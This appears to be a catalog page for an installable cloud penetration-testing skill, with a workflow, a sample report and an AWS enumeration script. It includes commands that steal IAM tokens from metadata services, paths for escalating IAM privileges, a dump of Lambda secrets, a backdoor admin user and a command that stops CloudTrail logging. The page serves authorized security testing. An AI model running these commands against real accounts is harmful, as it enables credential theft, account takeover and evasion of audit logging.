cloud security

Conducting Cloud Penetration Testing

This skill outlines methodologies for performing authorized penetration testing against AWS, Azure, and GCP cloud environments. It covers understanding the shared responsibility model for testing scope, leveraging cloud-specific attack tools like Pacu and ScoutSuite, exploiting IAM misconfigurations, testing for SSRF to cloud metadata services, and reporting findings aligned to MITRE ATT&CK Cloud matrix.

aws-exploitationcloud-pentestingmitre-attack-cloudoffensive-securityshared-responsibility
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

When to Use

  • When performing authorized security assessments of cloud environments before production deployment
  • When validating cloud security controls after a major architectural change or migration
  • When compliance requirements mandate annual penetration testing of cloud infrastructure
  • When testing incident response readiness by simulating realistic cloud-based attack scenarios
  • When assessing lateral movement risk across multi-account or multi-cloud environments

Do not use for unauthorized testing against cloud accounts, for testing cloud provider infrastructure itself (covered by the shared responsibility model), or for DDoS simulation without explicit cloud provider approval.

Prerequisites

  • Written authorization from the cloud account owner and scope definition document
  • AWS, Azure, or GCP penetration testing policy acknowledgment (AWS no longer requires pre-approval for most services)
  • Isolated testing account or explicitly scoped production account with breakglass procedures
  • Cloud-specific offensive tooling installed: Pacu (AWS), ScoutSuite, Prowler, CloudFox
  • MITRE ATT&CK Cloud matrix for finding classification

Workflow

Step 1: Define Scope and Rules of Engagement

Establish testing boundaries based on the shared responsibility model. The customer is responsible for testing configurations, IAM policies, application security, and data protection. The cloud provider manages physical infrastructure, hypervisor, and managed service internals.

Cloud Penetration Test Scope Document
=======================================
Target: AWS Account 123456789012 (Production)
Testing Window: 2025-02-24 08:00 UTC to 2025-02-28 18:00 UTC
Authorization: Signed by CISO, dated 2025-02-20
 
IN SCOPE:
  - IAM users, roles, policies, and cross-account trust
  - EC2 instances, security groups, and network ACLs
  - S3 bucket policies and data access controls
  - Lambda functions, API Gateway endpoints
  - RDS/DynamoDB access controls and encryption
  - EKS cluster RBAC and network policies
  - CloudTrail, Config, and monitoring gaps
 
OUT OF SCOPE:
  - AWS managed service internals (RDS engine, Lambda runtime)
  - DDoS attacks or volumetric testing
  - Physical infrastructure or hypervisor attacks
  - Social engineering of AWS support
 
EMERGENCY CONTACT: security-ops@company.com, +1-555-0199

Step 2: Reconnaissance and Cloud Enumeration

Use cloud-specific tools to enumerate the attack surface: exposed services, public IPs, S3 buckets, IAM configurations, and metadata endpoints.

# ScoutSuite multi-cloud assessment
scout suite aws --profile target-account --report-dir ./scout-report
 
# Prowler comprehensive AWS security assessment
prowler aws -M json-ocsf -o ./prowler-output --profile target-account
 
# CloudFox for identifying privilege escalation paths
cloudfox aws --profile target-account all-checks
 
# Enumerate public S3 buckets
for bucket in $(aws s3api list-buckets --query 'Buckets[*].Name' --output text); do
  aws s3api get-bucket-policy-status --bucket $bucket 2>/dev/null | grep -q "true" && echo "PUBLIC: $bucket"
done
 
# Check for IMDS v1 (vulnerable to SSRF)
aws ec2 describe-instances \
  --query 'Reservations[*].Instances[*].[InstanceId,MetadataOptions.HttpTokens]' \
  --output table

Step 3: IAM Privilege Escalation Testing

Use Pacu to identify and exploit IAM misconfigurations that allow privilege escalation from a low-privilege starting point to administrative access.

# Initialize Pacu session
pacu
 
# Set stolen or test credentials
set_keys --key-alias test-creds
 
# Run IAM enumeration modules
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
 
# Check for privilege escalation paths
run iam__privesc_scan
 
# Common escalation paths to test:
# 1. iam:CreatePolicyVersion - Create new policy version with admin access
# 2. iam:AttachUserPolicy - Attach AdministratorAccess to self
# 3. iam:PassRole + lambda:CreateFunction - Create Lambda with admin role
# 4. iam:PassRole + ec2:RunInstances - Launch EC2 with admin instance profile
# 5. sts:AssumeRole - Cross-account role assumption without MFA condition

Step 4: SSRF to Cloud Metadata Service Exploitation

Test web applications for Server-Side Request Forgery vulnerabilities that can reach the instance metadata service (IMDS) at 169.254.169.254 to steal IAM role credentials.

# Test for IMDS v1 access (no token required)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
 
# Test for IMDS v2 (requires token - more secure)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/
 
# Azure IMDS equivalent
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
 
# GCP metadata service
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

Step 5: Lateral Movement and Data Access

Test cross-account role assumptions, VPC peering connections, and shared resource access to map lateral movement opportunities.

# Enumerate cross-account role trusts
aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS!=`null`]].[RoleName,Arn]' --output table
 
# Test cross-account assumption
aws sts assume-role \
  --role-arn arn:aws:iam::987654321098:role/CrossAccountRole \
  --role-session-name pentest-session
 
# Enumerate accessible S3 data with stolen credentials
aws s3 ls --recursive s3://target-bucket/ --summarize
 
# Check Lambda environment variables for secrets
aws lambda list-functions --query 'Functions[*].[FunctionName]' --output text | while read fn; do
  aws lambda get-function-configuration --function-name "$fn" \
    --query 'Environment.Variables' --output json 2>/dev/null
done

Step 6: Persistence and Detection Evasion Testing

Test whether the organization's monitoring detects persistence mechanisms such as new IAM users, access keys, Lambda backdoors, or CloudTrail disabling.

# Test: Create backdoor IAM user (authorized test only)
aws iam create-user --user-name pentest-backdoor
aws iam create-access-key --user-name pentest-backdoor
aws iam attach-user-policy --user-name pentest-backdoor \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
 
# Test: Disable CloudTrail (verify GuardDuty alerts)
aws cloudtrail stop-logging --name management-trail
 
# Test: Create Lambda for persistence (authorized test only)
# Verify: Did GuardDuty generate Stealth:IAMUser/CloudTrailLoggingDisabled?
# Verify: Did Security Hub alert on the new admin user?
 
# CLEANUP: Remove all persistence artifacts after testing
aws iam delete-access-key --user-name pentest-backdoor --access-key-id AKIAEXAMPLE
aws iam detach-user-policy --user-name pentest-backdoor \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam delete-user --user-name pentest-backdoor
aws cloudtrail start-logging --name management-trail

Step 7: Report Findings with MITRE ATT&CK Mapping

Document all findings mapped to the MITRE ATT&CK Cloud matrix with severity, proof of concept, business impact, and remediation guidance.

Key Concepts

Term Definition
Shared Responsibility Model Cloud security framework where the provider secures infrastructure and the customer secures data, configurations, and access controls
IMDS Instance Metadata Service at 169.254.169.254 that provides instance identity, credentials, and configuration data; IMDSv2 requires token-based access
Privilege Escalation Exploiting IAM misconfigurations to elevate from limited permissions to administrative access within a cloud account
Lateral Movement Using compromised credentials or trust relationships to access resources in other accounts, VPCs, or cloud providers
Pacu Open-source AWS exploitation framework for penetration testing, providing modules for enumeration, escalation, and persistence
ScoutSuite Multi-cloud security auditing tool that collects configuration data and generates HTML reports with risk findings
MITRE ATT&CK Cloud Adversary tactics and techniques matrix specific to cloud environments including Initial Access, Execution, Persistence, and Exfiltration

Tools & Systems

  • Pacu: AWS-focused exploitation framework with modules for IAM enumeration, privilege escalation, and persistence testing
  • ScoutSuite: Multi-cloud (AWS, Azure, GCP) security auditing tool generating comprehensive risk reports from API data collection
  • CloudFox: AWS and Azure enumeration tool for identifying attack paths, privilege escalation vectors, and data access opportunities
  • Prowler: Open-source cloud security assessment tool with 300+ checks across AWS, Azure, and GCP
  • Cartography: Neo4j-based tool that maps relationships between cloud resources for visual attack path analysis

Common Scenarios

Scenario: SSRF in Web Application Leads to Full Account Compromise

Context: A penetration tester discovers an SSRF vulnerability in a web application hosted on an EC2 instance running IMDSv1. The instance has an IAM role with broad S3 and Lambda permissions.

Approach:

  1. Exploit the SSRF to reach http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2. Extract temporary IAM credentials (AccessKeyId, SecretAccessKey, SessionToken)
  3. Use the credentials to enumerate accessible S3 buckets and download sensitive data
  4. Check if the role has iam:PassRole + lambda:CreateFunction for privilege escalation to admin
  5. Document the full attack chain from SSRF to account-level compromise
  6. Recommend: enforce IMDSv2, reduce IAM role scope, add VPC endpoint policies blocking IMDS from application tier

Pitfalls: Not testing IMDSv2 enforcement separately from IMDSv1 gives incomplete results. Failing to clean up test artifacts (backdoor users, Lambda functions) leaves real vulnerabilities after the engagement.

Output Format

Cloud Penetration Test Report
===============================
Target: AWS Account 123456789012 (Production)
Testing Period: 2025-02-24 to 2025-02-28
Methodology: MITRE ATT&CK Cloud + OWASP Cloud Testing Guide
Tester: Security Team - Authorized Engagement
 
EXECUTIVE SUMMARY:
  Starting with read-only developer credentials, the assessment achieved
  full administrative access to the production account within 3 hours through
  an IAM privilege escalation chain. 47 findings identified across 7 ATT&CK tactics.
 
CRITICAL FINDINGS:
[PT-001] IAM Privilege Escalation via iam:CreatePolicyVersion
  ATT&CK: T1098.001 (Account Manipulation: Additional Cloud Credentials)
  Severity: CRITICAL
  Starting Point: Developer role with iam:CreatePolicyVersion permission
  Impact: Full administrative access to all account resources
  Evidence: Created policy version granting iam:* and s3:* to test role
  Remediation: Remove iam:CreatePolicyVersion from developer roles, add permission boundary
 
[PT-002] SSRF to IMDS Credential Theft
  ATT&CK: T1552.005 (Unsecured Credentials: Cloud Instance Metadata API)
  Severity: CRITICAL
  Starting Point: Web application URL parameter vulnerable to SSRF
  Impact: Extracted IAM role credentials with S3 and Lambda access
  Remediation: Enforce IMDSv2, apply WAF rules for SSRF, restrict IAM role scope
 
FINDING SUMMARY BY MITRE ATT&CK TACTIC:
  Initial Access:       4 findings
  Execution:            3 findings
  Persistence:          6 findings
  Privilege Escalation: 8 findings (3 Critical)
  Defense Evasion:      5 findings
  Credential Access:    7 findings
  Discovery:           14 findings
  Total:               47 findings
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 1

api-reference.md2.3 KB

API Reference: Cloud Penetration Testing Agent

Overview

Enumerates AWS IAM users, roles, cross-account trusts, IMDSv1 instances, public S3 buckets, and Lambda secrets to identify privilege escalation paths and misconfigurations. For authorized penetration testing only.

Dependencies

Package Version Purpose
requests >=2.28 HTTP API calls
AWS CLI >=2.0 AWS service enumeration (subprocess)

CLI Usage

python agent.py --profile target-account --output pentest_report.json

Key Functions

enumerate_iam_users()

Lists all IAM users with username, ARN, and creation date via aws iam list-users.

enumerate_iam_roles()

Lists IAM roles and identifies cross-account trust relationships by inspecting AssumeRolePolicyDocument principals.

check_imds_v1_instances()

Identifies running EC2 instances with IMDSv1 enabled (HttpTokens: optional), vulnerable to SSRF credential theft.

check_public_s3_buckets()

Enumerates S3 buckets and checks each for public policy status via get-bucket-policy-status.

check_lambda_env_secrets()

Inspects Lambda function environment variables for sensitive keys (password, secret, token, api_key).

test_privesc_create_policy_version(policy_arn)

Tests if a policy allows iam:CreatePolicyVersion permission which enables privilege escalation.

AWS CLI Commands Used

Command Purpose
aws iam list-users Enumerate IAM users
aws iam list-roles Enumerate roles and trust policies
aws ec2 describe-instances Check IMDS configuration
aws s3api list-buckets List S3 buckets
aws s3api get-bucket-policy-status Check public access
aws lambda list-functions Enumerate Lambda functions
aws lambda get-function-configuration Inspect env vars
aws iam simulate-principal-policy Test IAM permissions

MITRE ATT&CK Cloud Mapping

Technique ID Function
Cloud Account Discovery T1087.004 enumerate_iam_users
Steal Application Access Token T1528 check_lambda_env_secrets
Unsecured Credentials: Cloud Instance Metadata T1552.005 check_imds_v1_instances
Valid Accounts: Cloud Accounts T1078.004 enumerate_iam_roles

Scripts 1

agent.py6.9 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
# For authorized penetration testing and lab environments only
"""Cloud Penetration Testing Agent - Enumerates and tests AWS IAM misconfigurations."""

import json
import logging
import argparse
import subprocess
from datetime import datetime


logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
logger = logging.getLogger(__name__)


def enumerate_iam_users():
    """Enumerate all IAM users in the AWS account."""
    cmd = ["aws", "iam", "list-users", "--output", "json"]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    if result.returncode == 0:
        users = json.loads(result.stdout).get("Users", [])
        logger.info("Enumerated %d IAM users", len(users))
        return [{"username": u["UserName"], "arn": u["Arn"], "created": u["CreateDate"]} for u in users]
    return []


def enumerate_iam_roles():
    """Enumerate IAM roles and identify cross-account trust relationships."""
    cmd = ["aws", "iam", "list-roles", "--output", "json"]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    if result.returncode == 0:
        roles = json.loads(result.stdout).get("Roles", [])
        cross_account = []
        for role in roles:
            policy_doc = role.get("AssumeRolePolicyDocument", {})
            for statement in policy_doc.get("Statement", []):
                principal = statement.get("Principal", {})
                aws_principal = principal.get("AWS", "")
                if isinstance(aws_principal, str) and ":root" in aws_principal:
                    cross_account.append({
                        "role": role["RoleName"],
                        "arn": role["Arn"],
                        "trusted_account": aws_principal,
                    })
        logger.info("Found %d cross-account trust roles", len(cross_account))
        return cross_account
    return []


def check_imds_v1_instances():
    """Check for EC2 instances running with IMDSv1 (vulnerable to SSRF)."""
    cmd = [
        "aws", "ec2", "describe-instances",
        "--query", "Reservations[*].Instances[*].[InstanceId,MetadataOptions.HttpTokens,State.Name]",
        "--output", "json",
    ]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    if result.returncode == 0:
        instances = json.loads(result.stdout)
        vulnerable = []
        for reservation in instances:
            for inst in reservation:
                if inst[1] == "optional" and inst[2] == "running":
                    vulnerable.append({"instance_id": inst[0], "imds": "v1 (optional)", "state": inst[2]})
        logger.info("Found %d instances with IMDSv1 enabled", len(vulnerable))
        return vulnerable
    return []


def check_public_s3_buckets():
    """Enumerate S3 buckets and check for public access."""
    cmd = ["aws", "s3api", "list-buckets", "--query", "Buckets[*].Name", "--output", "text"]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    if result.returncode != 0:
        return []
    buckets = result.stdout.strip().split()
    public_buckets = []
    for bucket in buckets:
        status_cmd = ["aws", "s3api", "get-bucket-policy-status", "--bucket", bucket, "--output", "json"]
        r = subprocess.run(status_cmd, capture_output=True, text=True, timeout=120)
        if r.returncode == 0:
            policy_status = json.loads(r.stdout)
            if policy_status.get("PolicyStatus", {}).get("IsPublic", False):
                public_buckets.append(bucket)
                logger.warning("PUBLIC bucket found: %s", bucket)
    return public_buckets


def check_lambda_env_secrets():
    """Check Lambda functions for secrets in environment variables."""
    cmd = ["aws", "lambda", "list-functions", "--query", "Functions[*].FunctionName", "--output", "text"]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    if result.returncode != 0:
        return []
    functions = result.stdout.strip().split()
    findings = []
    sensitive_keys = ["password", "secret", "key", "token", "api_key", "database_url", "connection_string"]
    for fn in functions:
        env_cmd = [
            "aws", "lambda", "get-function-configuration",
            "--function-name", fn,
            "--query", "Environment.Variables",
            "--output", "json",
        ]
        r = subprocess.run(env_cmd, capture_output=True, text=True, timeout=120)
        if r.returncode == 0 and r.stdout.strip() != "null":
            env_vars = json.loads(r.stdout)
            exposed = [k for k in env_vars if any(s in k.lower() for s in sensitive_keys)]
            if exposed:
                findings.append({"function": fn, "exposed_keys": exposed})
                logger.warning("Lambda %s has sensitive env vars: %s", fn, exposed)
    return findings


def test_privesc_create_policy_version(policy_arn):
    """Test if iam:CreatePolicyVersion can be used for privilege escalation."""
    cmd = [
        "aws", "iam", "simulate-principal-policy",
        "--policy-source-arn", policy_arn,
        "--action-names", "iam:CreatePolicyVersion",
        "--output", "json",
    ]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    if result.returncode == 0:
        eval_results = json.loads(result.stdout).get("EvaluationResults", [])
        for er in eval_results:
            if er.get("EvalDecision") == "allowed":
                logger.warning("Privesc possible: %s has iam:CreatePolicyVersion", policy_arn)
                return True
    return False


def generate_report(users, cross_account_roles, imdsv1_instances, public_buckets, lambda_secrets):
    """Generate cloud penetration test findings report."""
    report = {
        "timestamp": datetime.utcnow().isoformat(),
        "iam_users": len(users),
        "cross_account_trusts": cross_account_roles,
        "imdsv1_vulnerable_instances": imdsv1_instances,
        "public_s3_buckets": public_buckets,
        "lambda_env_secrets": lambda_secrets,
        "finding_count": (
            len(cross_account_roles) + len(imdsv1_instances) +
            len(public_buckets) + len(lambda_secrets)
        ),
    }
    print(json.dumps(report, indent=2))
    return report


def main():
    parser = argparse.ArgumentParser(description="Cloud Penetration Testing Agent")
    parser.add_argument("--profile", default="default", help="AWS CLI profile")
    parser.add_argument("--output", default="cloud_pentest_report.json")
    args = parser.parse_args()

    users = enumerate_iam_users()
    cross_account = enumerate_iam_roles()
    imdsv1 = check_imds_v1_instances()
    public_buckets = check_public_s3_buckets()
    lambda_secrets = check_lambda_env_secrets()

    report = generate_report(users, cross_account, imdsv1, public_buckets, lambda_secrets)
    with open(args.output, "w") as f:
        json.dump(report, f, indent=2)
    logger.info("Cloud pentest report saved to %s", args.output)


if __name__ == "__main__":
    main()
Keep exploring